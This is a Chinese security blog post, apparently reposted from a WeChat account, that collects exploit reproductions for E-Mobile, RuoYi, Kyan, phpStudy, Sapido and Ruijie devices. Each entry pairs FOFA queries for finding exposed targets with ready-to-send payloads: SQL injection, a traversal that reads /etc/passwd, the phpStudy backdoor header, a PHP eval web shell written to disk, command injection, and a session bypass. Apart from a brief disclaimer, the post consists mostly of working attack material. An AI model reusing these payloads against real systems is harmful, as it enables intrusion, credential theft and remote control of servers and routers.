有手就行~

admin 2022年7月6日08:43:10评论693 views字数 3798阅读12分39秒阅读模式


   “ 晚上睡不着的时候,打电话给我,我是一个负责任的男人”


导读

 

本文章仅用于交流学习,请勿使用该方法进行违法活动,谢谢!(复现过程略显简单,有需要复现文档的直接去公众号回复“洗澡” 即可)


复现索引


有手就行~


E-Mobile 前台SQL注入漏洞


1)FOFA语句

E-Mobile 6.6

有手就行~

2)poc

POST /messageType.do HTTP/1.1Host: xxx.xxx.xxx.xxxCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=abc2sezIkpTECehgf1vJxConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 109


method=create&typeName=1';CREATE ALIAS sleep222 FOR"java.lang.Thread.sleep";CALL sleep222(3000);select+'1

有手就行~


若依管理系统后台任意文件读取


1)FOFA语句

app="若依-管理系统"

有手就行~

2)登录后台后访问 Url,存在漏洞直接下载passwd文件

https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd

有手就行~

3)ky修改文件的路径,下载自己想要的文件

有手就行~


Kyan 网络监控设备账号密码泄露漏洞


1)FOFA语句

title="platform - Login"

有手就行~

2)POC

http://ip/hosts   

有手就行~

3)登录界面

有手就行~


phpStudy后门漏洞复现(旧)


1)FOFA语句

title="phpStudy探针2014" //2016,2018都行,只要存在漏洞大致利用方式一样

有手就行~

2)2014的检查是否引用了php_xmlrpc.dll文件(只要引用了该文件,恶意代码就可以触发),通过phpinfo下查看

有手就行~

3)找到accept-encoding: gzip, deflate,把逗号后面的空格删掉,改为accept-encoding: gzip,deflate,然后在accept-encoding: gzip,deflate这行前面或后面加上一行

accept-charset:c3lzdGVtKCdkaXInKTs=

然后发送(这里的c3lzdGVtKCdkaXInKTs=是经过base64加密的)

GET / HTTP/1.1Host: 118.107.40.93User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip,deflateConnection: closeaccept-charset:c3lzdGVtKCdkaXInKTs=Upgrade-Insecure-Requests: 1Cache-Control: max-age=0.0"

4)发送数据包

有手就行~

5)发送的命令解码如下

有手就行~

注:此时可以向目标服务器写入一句话(1)dir:查看当前目录下的内容,可以一层层查看,最后找到WWW目录所在,将一句话写入(2)chdir:查看当前所在目录,类似于linux中的pwd(3)利用bp向目标系统指定位置写一句话木马,^表示写入特殊字符,例如<或>。写入后MoBei.php内容为:<?php @eval($_REQUEST[MoBei);?>payload:
echo ^<?php @eval($_REQUEST[cmd]);?^> > MoBei.php

6)获取网站路径

有手就行~

7)一句话base64加密

有手就行~

8)访问看是否写入成功

有手就行~

9)菜刀连接

有手就行~


Sapido多款路由器命令执行漏洞


1)FOFA语句

app="Sapido-路由器"

有手就行~

2)固件中存在一个asp文件为 **syscmd.asp** 存在命令执行

有手就行~

3)直接输入就可以命令执行了

有手就行~


锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 CNVD-2021-09650


1)FOFA语句

title="锐捷网络-EWEB网管系统" && icon_hash="-692947551"

有手就行~2)出现漏洞的文件在***/guest_auth/guestIsUp.php***

<?php    //查询用户是否上线了    $userip = @$_POST['ip'];    $usermac = @$_POST['mac'];        if (!$userip || !$usermac) {        exit;    }    /* 判断该用户是否已经放行 */    $cmd = '/sbin/app_auth_hook.elf -f ' . $userip;    $res = exec($cmd, $out, $status);    /* 如果已经上线成功 */    if (strstr($out[0], "status:1")) {        echo 'true';    }?>

3)通过命令拼接的方式构造命令执行

POST /guest_auth/guestIsUp.phpmac=1&ip=127.0.0.1|cat /etc/passwd > MoBei.txt

4)然后访问页面  /guest_auth/MoBei.txt  就可以看到命令执行的结果

有手就行~

锐捷SSL VPN 越权访问漏洞


1)FOFA语句

icon_hash="884334722" || title="Ruijie SSL VPN"

2)访问目标 

http://xxx.xxx.xxx.xxx/cgi-bin/installjava.cgi

有手就行~

3)利用POC

GET /cgi-bin/main.cgi?oper=getrsc HTTP/1.1Host: xxx.xxx.xxx.xxxConnection: closePragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6Cookie: UserName=xm; SessionId=1; FirstVist=1; Skin=1; tunnel=1
其中注意的参数为Cookie: UserName=xm; SessionId=1; FirstVist=1; Skin=1; tunnel=1
UserName 参数为已知用户名在未知登录用户名的情况下 漏洞无法利用(根据请求包使用Burp进行用户名爆破)

有手就行~

4)用户名正确时会返回敏感信息

有手就行~

5)通过此方法知道用户名后可以通过漏洞修改账号参数

访问 http://xxx.xxx.xxx.xxx/cgi-bin/main.cgi?oper=showsvr&encode=GBK&username=liuw&sid=1&oper=showres

有手就行~


其他一些比较老的漏洞


声明下:下面的这些漏洞大部分已经修护了,收集的文档,需要的看看下面获取方式吧!


有手就行~


PS:获取方式-公众号回复“洗澡”


- - - - - - - - - - - - - - - END - - - - - - - - - - ----------


点关注,不迷路

觉得不错的帮忙点个“赞”,“在看” ~~~


原文始发于微信公众号(五六七安全团队):有手就行~

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月6日08:43:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   有手就行~http://cn-sec.com/archives/1030859.html

发表评论

匿名网友 填写信息